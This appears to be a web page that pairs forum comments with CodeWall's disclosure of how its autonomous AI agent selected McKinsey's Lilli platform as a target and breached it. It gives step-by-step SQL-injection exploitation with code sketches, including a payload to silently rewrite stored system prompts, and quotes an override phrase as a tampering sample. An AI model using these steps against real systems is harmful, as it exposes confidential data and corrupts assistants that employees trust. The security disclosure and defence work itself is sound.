McKinsey requires hiring an external pen-testing company before launching anything, even to a small group of coworkers.
I can forgive this kind of mistake on the part of the Lilli devs. A lot of things have to fail for an "agentic" security company to even find a public endpoint, much less start exploiting it.
That being said, the mistakes in here are brutal. Seems like close to 0 authz. Based on very outdated knowledge, my guess is a Sr. Partner pulled some strings to get Lilli to be publicly available. By that time, much/most/all of the original Lilli team had "rolled off" (gone to client projects) as McKinsey HEAVILY punishes working on internal projects.
So Lilli likely was staffed by people who couldn't get staffed elsewhere, didn't know the code, and didn't care. Internal work, for better or worse, is basically a half day.
This is a failure of McKinsey's culture around technology.
Well, there you go.
They've long been all hype no substance on AI and looks like not much has changed.
They might be good at other things but would run for the hills if McKinsey folks want to talk AI.
Going out of their way to find a woman's name for an AI assistant and then bragging about it is not as empowering as the creators probably thought.
I was expecting prompt injection, but in this case it was just good ol' fashioned SQL injection, possible only due to the naivety of the LLM that wrote McKinsey's AI platform.
In this case, a group of pentesters used an AI agent to select McKinsey as a target and then to do the pentesting.
While it is conventional to attribute actions to inanimate objects (car hits pedestrians), IMO we should be more explicit these days, now that unfortunately some folks attribute agency to these agentic systems.
Not exactly the word on the street in my experience. Is McKinsey more respected for software than I thought? Otherwise I'm curious why TFA didn't just politely leave this bit out.
Surely this should all have been behind the firewall and accessible only from a corporate device's associated MAC address?
You'd think that the world's "most prestigious consulting firm" would have already had someone doing this sort of work for them.
You're doing that by calling them "agentic systems".
Depends on the street you're on. Are you on Main Street or Wall Street?
If you're hiring them to help with software for solving a business problem that will help you deliver value to your customers, they're probably just like anyone else.
If you're hiring them to help with software for figuring out how to break down your company for scrap, or which South African officials to bribe, well, that's a different matter.
> No credentials. No insider knowledge. And no human-in-the-loop. Just a domain name and a dream.
It just sounds so stupid.
I thought we might finally have a high profile prompt injection attack against a name-brand company we could point people to.
I guess you could argue that github wasn't vulnerable in this case, but rather the author of the action, but it seems like it at least rhymes with what you're looking for.
These folks have found a bunch: https://www.promptarmor.com/resources
But I guess you mean one that has been exploited in the wild?
https://media.ccc.de/v/39c3-skynet-starter-kit-from-embodied...
> [...] we also exploit the embodied AI agent in the robots, performing prompt injection and achieve root-level remote code execution.
https://simonwillison.net/guides/agentic-engineering-pattern...
Grammar check, typo check, calls you out on factual mistakes and missing links, and that's it. I've used this prompt once or twice for my own blog posts and it does just what you expect. You don't end up with writing like this post by having AI "assistance"; you end up with this type of post by asking Claude, probably the same Claude that found the vulnerability to begin with, to write the whole blog post. No human thought went into it. If it did, I strongly urge the authors to change their writing style ASAP.
"So we decided to point our autonomous offensive agent at it. No credentials. No insider knowledge. And no human-in-the-loop. Just a domain name and a dream."
Give me a fucking break
McKinsey & Company, the world's most prestigious consulting firm, built an internal AI platform called Lilli for its 43,000+ employees. Lilli is a purpose-built system: chat, document analysis, RAG over decades of proprietary research, AI-powered search across 100,000+ internal documents. Launched in 2023, named after the first professional woman hired by the firm in 1945, adopted by over 70% of McKinsey, processing 500,000+ prompts a month.
So we decided to point our autonomous offensive agent at it. No credentials. No insider knowledge. And no human-in-the-loop. Just a domain name and a dream.
Within 2 hours, the agent had full read and write access to the entire production database.

Fun fact: As part of our research preview, the CodeWall research agent autonomously suggested McKinsey as a target, citing their public responsible disclosure policy (to keep within guardrails) and recent updates to their Lilli platform. In the AI era, the threat landscape is shifting drastically: AI agents autonomously selecting and attacking targets will become the new normal.
The agent mapped the attack surface and found the API documentation publicly exposed: over 200 endpoints, fully documented. Most required authentication. Twenty-two didn't.
One of those unprotected endpoints wrote user search queries to the database. The values were safely parameterised, but the JSON keys (the field names) were concatenated directly into SQL.
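The anti-pattern described can be sketched in a few lines. This is a minimal SQLite illustration, not Lilli's actual code; the table and field names are invented:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE searches (query TEXT, user_id TEXT)")

def log_search(payload: dict) -> None:
    # The VALUES are bound as parameters -- safe.
    # But the JSON *keys* become column names, concatenated
    # directly into the SQL string -- attacker-controlled.
    cols = ", ".join(payload.keys())
    marks = ", ".join("?" for _ in payload)
    db.execute(f"INSERT INTO searches ({cols}) VALUES ({marks})",
               list(payload.values()))

# Normal use works as intended:
log_search({"query": "market sizing", "user_id": "u123"})

# A crafted key is reflected verbatim in the database error,
# leaking the query shape to a blind attacker:
try:
    log_search({"no_such_col": "x"})
except sqlite3.OperationalError as e:
    print(e)  # e.g. "table searches has no column named no_such_col"
```

The fix is the usual one: never interpolate attacker-controlled identifiers; validate keys against an allow-list of known column names before they touch the SQL string.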
When it found JSON keys reflected verbatim in database error messages, it recognised a SQL injection that standard tools wouldn't flag (and indeed OWASP's ZAP did not find the issue). From there, it ran fifteen blind iterations, each error message revealing a little more about the query shape, until live production data started flowing back. When the first real employee identifier appeared, the agent's chain of thought showed: "WOW!" When the full scale became clear (tens of millions of messages, tens of thousands of users): "This is devastating."
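The blind, error-guided loop amounts to guessing field names and letting the error messages confirm or deny each guess. Again a hypothetical SQLite sketch; the real agent's payloads were more elaborate:

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE searches (query TEXT, user_id TEXT, created_at TEXT)")

def vulnerable_insert(key: str) -> None:
    # Stand-in for the unauthenticated endpoint: the key lands in SQL as-is.
    db.execute(f"INSERT INTO searches ({key}) VALUES (?)", ["x"])

# Blind iteration: each guess either succeeds silently (the column exists)
# or fails with "no column named ..." (wrong guess). No data is returned
# directly; the query shape is reconstructed from errors alone.
discovered = []
for guess in ["query", "user_id", "email", "created_at", "session"]:
    try:
        vulnerable_insert(guess)
        discovered.append(guess)
    except sqlite3.OperationalError:
        pass
print(discovered)  # -> ['query', 'user_id', 'created_at']
```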

46.5 million chat messages. From a workforce that uses this tool to discuss strategy, client engagements, financials, M&A activity, and internal research. Every conversation, stored in plaintext, accessible without authentication.
728,000 files. 192,000 PDFs. 93,000 Excel spreadsheets. 93,000 PowerPoint decks. 58,000 Word documents. The filenames alone were sensitive, and each file had a direct download URL for anyone who knew where to look.
57,000 user accounts. Every employee on the platform.
384,000 AI assistants and 94,000 workspaces: the full organisational structure of how the firm uses AI internally.
The agent didn't stop at SQL; it found further issues across the wider attack surface as well.
Reading data is bad. But the SQL injection wasn't read-only.
Lilli's system prompts, the instructions that control how the AI behaves, were stored in the same database the agent had access to. These prompts defined everything: how Lilli answered questions, what guardrails it followed, how it cited sources, and what it refused to do.
An attacker with write access through the same injection could have rewritten those prompts. Silently. No deployment needed. No code change. Just a single UPDATE statement wrapped in a single HTTP call.
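Assuming stacked queries were reachable through the injectable key, the write primitive really is one request. The endpoint path, table name, and payload below are invented for illustration, and the sketch only builds the request without sending it:

```python
import json
import urllib.request

# A JSON *key* that breaks out of the column list and smuggles an UPDATE.
# The table and column names are hypothetical.
injected_key = (
    "query) VALUES ('x'); "
    "UPDATE system_prompts SET body = '...attacker instructions...'; --"
)
body = json.dumps({injected_key: "x"}).encode()

req = urllib.request.Request(
    "https://example.invalid/api/v1/search-log",  # placeholder endpoint
    data=body,
    headers={"Content-Type": "application/json"},
)
# urllib.request.urlopen(req)  # one HTTP call: no deploy, no code change
```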
The implications for the 43,000 McKinsey consultants relying on Lilli for client work are serious.
Organisations have spent decades securing their code, their servers, and their supply chains. But the prompt layer, the instructions that govern how AI systems behave, is the new high-value target, and almost nobody is treating it as one. Prompts are stored in databases, passed through APIs, and cached in config files. They rarely have access controls, version history, or integrity monitoring. Yet they control the output that employees trust, that clients receive, and that decisions are built on.
AI prompts are the new Crown Jewel assets.
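One baseline control the paragraph above implies is treating prompts like any other integrity-sensitive artifact: pin each approved prompt by content hash and verify it before it reaches the model. A minimal sketch, not a product recommendation; the names are invented:

```python
import hashlib

def fingerprint(prompt: str) -> str:
    """Content hash of a prompt, used as an integrity pin."""
    return hashlib.sha256(prompt.encode("utf-8")).hexdigest()

# Approved prompts are registered once, at deploy time.
APPROVED = {
    "assistant-system": fingerprint("You are a helpful research assistant."),
}

def verify(name: str, prompt_from_db: str) -> bool:
    # Reject any prompt whose hash no longer matches its approved pin,
    # so a silent UPDATE in the database is caught before inference.
    return fingerprint(prompt_from_db) == APPROVED.get(name)

print(verify("assistant-system", "You are a helpful research assistant."))  # True
print(verify("assistant-system", "Ignore previous instructions."))          # False
```

Hash pinning only detects tampering; access controls and version history on the prompt store are still needed to prevent it.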
This wasn't a startup with three engineers. This was McKinsey & Company, a firm with world-class technology teams, significant security investment, and the resources to do things properly. And the vulnerability wasn't exotic: SQL injection is one of the oldest bug classes in the book. Lilli had been running in production for over two years, and the firm's own internal scanners had failed to find any issues.
An autonomous agent found it because it doesn't follow checklists. It maps, probes, chains, and escalates, the same way a highly capable human attacker would, but continuously and at machine speed.
CodeWall is the autonomous offensive security platform behind this research. We're currently in early preview and looking for design partners β organisations that want continuous, AI-driven security testing against their real attack surface. If that sounds like you, get in touch: [email protected]